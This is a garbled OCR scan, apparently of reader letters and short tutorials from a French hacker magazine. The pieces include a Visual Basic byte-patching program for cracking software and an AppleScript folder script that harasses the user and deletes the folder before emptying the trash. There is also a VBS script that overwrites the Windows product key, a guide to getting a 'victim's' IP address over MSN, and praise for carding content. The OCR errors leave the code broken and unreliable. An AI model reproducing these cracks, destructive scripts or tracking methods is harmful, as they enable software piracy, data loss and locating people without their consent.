"HKEY_ CURRENT _USER\System\CurrentControlSef\Services\Glass\Monitor\" 
"HKEY_CURRENT_USER\System\GurrentGontrolSel\Services\5lass\PEMIA\" 
"HNEY_ CURRENT _USER\System\GurrentControlSel\Services\Glass\Mouse\" 


Au lieu de mettre (toujours par ordre) : 


"HKEY_LOCAL_ MACHINE System\GurrentControlSel Services\Glass\Printer\" 
"HKEY_LOGAL_ MACHINE System\LurrentControlSe! Services \Glass\Keyhoard\" 
"HKEY_LOCAL_ MACHINE System\GurrentControlSe! Services\Glass\Modem\" 
"HKEY_LOCAL_ MACHINE System LurrentControlSel\Services\Glass\Monitor\" 
"HKEY_LOCAL MACHINE \System\LurrentControlSef\Services\Glass\PCMIA\" 
"HKEY_LOCAL_ MACHINE System\CurrentControlSef\Services\£lass\Mouse\" 


À part ça j'ai bien aimé la partie carding (sur les CB) et j'espère qu'il y en aura beaucoup d'autre. Longue vie à HACKERZ VOICE. 
ReSpAWN 
(PS. : Répondez vite SVP :) 


Hchiers invisibles Sur Mac 


Bonjour, 

Pour trouver des fichiers invisbles sous Mac 8.6. | 

Faire Pomme-+F puis dans la fenêtre “recherche de fichier” maintenir la touche ALT enfoncée en cliquant sur “le nom ”. La un menu dérou- 
lant apparait et ajoute à la fin visibilité. Il ne reste plus qu'à le choisir. 


Sinon encore plus simple sous systeme 9 et superieur, faire pomme + F puis édition dans les options avancées, vous avez la possibilité de 
cocher sont invisbles et trouver ainsi vos fichiers invisbles. 


Bonne chasse. ; 
André 


Pour les lecteurs Suisses 


Pour répondre au lecteur Suisse qui cherchait où acheter son magazine préféré, j'ai deux adresses: 


1. Le magasin de presse du centre commercial de Crissier (Vd) 


2. La maison de la presse à St-Genis Pouilly (France) 


Moi j'habite près de St-Genis, donc c'est là que je me le procure. 


AA 
Max 
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Prog source une contribution 


Bonjour, 

Je vous lis depuis maintenant un bon bout de temps. 

Je trouve votre idée de cours de crack superbe, mais 1l manque quelque chose. 

Je vous envoie donc ce qui, pour moi, manque. | 

Il s'agit d'un prog en visual basic. (je sais, c'est un produit micro$oft, mais bon...) qui permet de faire des cracks. 
Il suffit de modifier ce qui est indiqué en rouge. (voir plus bas pour plus d'explications...) 


Sub Main() 
On Error Goo Error 
IE FleLen(App.Path & "\NomProg.exe") =0 Then Goïo Error | 
Open App.Path & "\NomProg.exe" For Binary Access Write As #1 
Put #1, octet, hyle 
Close #1 
MsgBox "Cracked !", vhApplicationModal, “OK " 
Goïo Fin 
Error: 
On Error Resume Next . 
Close #1 
MsgBox "Veuillez mettre le crack dans le repertoire de l'application!", vhExclamation, “Erreur !” 
Fin: 
End Suh 


NomProg : Il s'agit du nom du programme SANS le .exe 

octet : emplacement de l'octet à modifier dans le programme EN DECIMAL. 

byte : valeur à mettre à la place de l'ancienne EN DECIMAL. 

(en décimal signifie par exemple que si vous voulez mettre 75 (qui correspond en assembleur à "je") par 74 (qui correspond lui à "jne" en 
assembleur), 1l vous faut mettre 117 car &H75 =117. 

Cracked ! : Vous mettez ce que vous voulez pour indiquez que le crack s'est déroulé avec succé! ;) 


L 
Notes : Pour créer ce prog, il suffit juste de créer un nouveau projet sous visual basic, puis d'insérer un nouveau module. 
Voilà. #4 


Bon, maintenant, j'ai une tite question: Je n'ai pas pu acheter le hors série N° 2. 


Bonne continuation... 


Tommy Lee : 
Au fond des tiroir non mais sur le net en PDE oui. Faut bien chercher, C planqué 
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Sur mac, les 3 principaux langages pour programmer sont évidemment le C (et C++) le RealBasic et APPLE SCRIPT. 
Aujourd'hui on va voir les possibilités d'APPLE SCIRIPT (ke je le trouve vraiment trop fun …;0) 

Pour créer un Apple script vous avez un éditeur de scrit dans votre mac : 

“Éditeur de scripts“ mais il y en en a bien d'autres sur le net si vous cherchez ; 


Les Base De Apple Script 


Déjà un Apple Script a pour ligne d' introduction LUE 
chose souvent kom : 


 tellapplication "Finder" 
et fini par : 
el tell 
mais 1l y en a beaucoup d'autres. 
Le premier s'exécute en application et le second : (on opening 
folder this folder) se fait a l'ouverture d'un dossier (truck :les 


signe -- sont pour introduire des commentaires) . 


D'abord les commandes à la con : : 


- — parler : 


tell application "Finder" 


say "hello" — dit hello (je vousconseilledecauserenanglaissinon essayez 


le french mais l'accent est po terrible c délire quand même ;0) 
en lell 


Faire une hoite de dialogue 
display dialog “Bienvenue À grand Maître" 
(truck dans le texte : je vous conseille d'ajouter :"buttons 
{"OK"} default | 
button 1 with icon 2" après le text ci-dessus 11 permet de ne 
mettre qu'un seul bouton, voir l'exemple plus bas) 


Les scripts de Dossier 


Maintenant on va voir les truck drol ke l'on peut faire avec les 


script ki s'attachent o dossier (c la ke je m'éclate) 


Truck : pour attacher un script a un dossier fait "etrl" et cliquez 
sur le dossier voulu puis “associer unscript a ce dossier" etc.) 


D'abord il fo savoir K'il ne fo pas commencer le script par : 
tell application “Finder” 
mais par: 


tell application “Finder” 
-- Ç ici que l'on écrit le prog 
en tell 


M opening folder this_ folder 
IS 


end opening folder 
on va commencer par : 


on opening lolder this. folder - à l'ouverture du dossier ce dossier : 


| el application “’Fnder" appelle le finder 


close the window of this_folder -- ferme le dossier ce dossier 
end tell-- arrête l'appel du finder : 
end opening folder - fin d'appel de l'ouverture du dossier 
(je suis eclaté en mettant ça sur le HD dans un cybercafé de brel- 
le :trop lol) 


Maintenant on va compiler le tout ce que l'on a vu pour en faire 
un trop marrant : 


on opening folder this_folder-By zobi8225 @Mac£Phus. Fest 
tell application "Finder" 


display dialog “Zobi8225 is the Master lol" buttons £"0K"} default button with 
iCON 2 


say “you are just a fucking bitch" --toujours des mots doux... 


close the window of this_ folder-- donc à l'ouverture de ce dossier 
cedossier se ferme. 


en tel 
end opening folder 


on closing folder window for this_folder--puis à la fermeture du done ce 


dossier ouvre ce dossier 
tell application "Finder" 


open the window of this_folder 
end tell 

end closing folder window for 

Donc si vous avez compris ce dossier s’ouvre, vous dit un mot 
doux et se referme puis se ré ouvre redit son mot doux puis se, 
referme etc. 


Attention niet virus ! 
A Aussi : 


on opening folder this_ folder 
tell application “Finder” 
delete this _ folder -- détru£it le dossier ce dossier ! 
empty trash--vide la poubelle 
end tell--arrête l'appel du finder . 
end opening folder-- fin d'appel de l'ouverture du dossier 


qui est + rapide et plus efficace que le précédent 


(truck kand vous deletez un qqch en apple CH oubliez po la 
commande -empty trash- ) 


Dans le prochain num un virus de lamer en AppleScript 
By [MG+]zobi8225 
www.MacGplus.fr.st (vraiment déconseillé au winfuckien) 


Le résultat du concours Mac Hack est en page 44 et 49, 
[MG+-JLobi8225 
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Clef windows 


Salut .. L 
En me promenant dans le RegEdit j'ai vue qu'on pouvait changer la Clef windows de son system en changant la chaîne : : 


"HKEY_LOGAL_ MACHINE \Software\Microsof{\ Windows\GurrentVersion\Productid" 
pour la clef OEM et en modifiant la chaîne : 

"HKEV--LOCAL_ MACHINE Software \Microsoft\Windows\GurrentVersion\Product{ey" 
par la suite on peut faire un script VBS : 


Dim WSHShell 

 L Welcome MsgBox Message Text = "Etes vous sur de vouloir changer votre clef Windows ?" 
L_Welcome_ MsgBox Tle Text = "ATTENTION" 
Call Welcome() 


Set WSHShell = WScript.Create0hjeet("WScriptShell") 


WSHShelLRegWrite “HKEY_ LOCAL. MACHINESoftware\Microsof\Windows\EurrentVersion\Productid", "FUGKED-DEM-FUCKED-FUCKED" 


WSHShell.RegWrite "HKEY_LOCAL_ MACHINE \Software\Microsof\Windows\SurrentVersion ProductKey", "FUCKED-FUCKED-FUCKED-FUGKED" 
Sub Welcome() 


Dim intDolt | 


intDolt= MsgBox(L Welcome. MsgBox Message Text, 
vhyesno + vhinformation, | 
L_Welcome_MsgBox_Tille_ Text) 
{EintDolt = vhGancel Then 
WSeript.Quit 
fnill 
Ent Sub 


Je sais pas si cafert à grande chose mais bon. peut-être si Mr Micro$oft voudrait vérifier l'autentisité de son Os. 


Ps : cool votre e-zines 
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: DECEMBRE 200! nn Le manuel de SES 1 OA D 


Comment obtenir l'adresse 1P de quelqu'un qui utilise MSN Messenger 


DISCLAIMER 
Je ne suis en aucun cas responsable des 
conséquences que pourraient causer se tuto- 
rial. 










. Matériel Nécessalre : Un PC avec Windows, Une connexion à internet, MSN Messenger, et quelqués logiciels … 


En suivant ce tutorial vous allez pouvoir obtenir facilement l'adresse [P de quelqu'un, mais peut-être que Microsoft va réagir et va 
sûrement faire un Patch :) 


Vous pouvez obtenir l'adresse IP que quand la personne accepte un téléchargement. Car quand vous envoyez des messages, cela passe 
par le serveur de MSN Messenger, done votre IP et celle de votre correspondant sont cachées. | : 


Mais quand vous téléchargez un fieier ou que vous en envoyez un, la connection ne passe plus par le serveur de MSN, le fichier passe 
directement d'un ordinateur a l'autre ! 

Une fois que la victime a accepté de vous envoyer ou de recevoir un fichier, allez dans Menu démarrer puis exécuter et tapez "netstat" 
(sans les guillemets) 


Pour Windows ME, 200, ou XP Je erois qu'il faut aller dans Commandes MS-DOS et taper "netstat" Vous allez avoir à l'écran 
quelque chose qui ressemble à ça : 


Prolo Adresse Locale Adresse Distante | Etal 

TCP Nomordi:1033 msgr-ns29 msgrhotmail.com:1863 ESTABLISHED 
TCP Nomordi:1040 msgr-sb26 msgrhotmail.com:1863 ESTABLISHED 
TCP Nomordi: <ADRESSE DE LA VICTIME> ESTABLISHED 


Pour que l'identification de l'adresse de la wietime soit plus facile, fermez tout sauf MSN Messenger. 
Car netstat sert à voir toutes les connexions aetives, donc moins 1l y en a, plus c'est facile à trouver la connexion avec la victime. 


Les deux premières lignes sont les connexions au serveur de MSN, Et la troisième est la connexion avec la victime 
Regardez l'adresse quiest à la place de <ADRESSE DE LA VICTIME : vous devriez voir quelque chose comme : 'machin-0-000-000.four- 
nisseurdacces.com" 


Maintenant vous pouvez effectuer un lookup sur cette adresse, avec un programme capable d'en faire.-> Vous pouvez télécharger 
TJPing sur mon site (http://www.enagulma.frst} | 
Et voilà ! Maintenant vous avez l'adresse IP de la victime. 


Tutorial crée par “I\ @ 1<" 
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"L'hacktion-shirt Zi HackAdemY” 


By Hackerz Voice 





We need You, en achetant ce tee shirt vous contribuez 
au développement de la première Hack school française 





Il 7e 
Hack ADEMY “ 


3 tee shirts 
Zi HackAdemY” 299 FF 
- anonymous guest - 





Je commande à NOM Ta ne Prénom: ie Signature M4 
fa 0 [1-1 RO SRE RE ES SERRE EP SE EE 
COCA VIe LR Rem qre 
3 ’Zi HackAdemY” 1 Zi HackAdemY” 


[_] par chèque à l'ordre de DMP, 26 bis, Rue Jeanne d'Arc, 94160 Saint-Mandé Taille XL XXL 


[_] par Carte Bleue 





Expire en / 


6h à 


8 
>\ nus 


Join 
21 HACKADEMY 


01 40 21 01 20 
WWW.dmpfrance.com 
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Recommandé par HZV 


Au 
G LELLE 
No 


pressure Al 


1 LS 





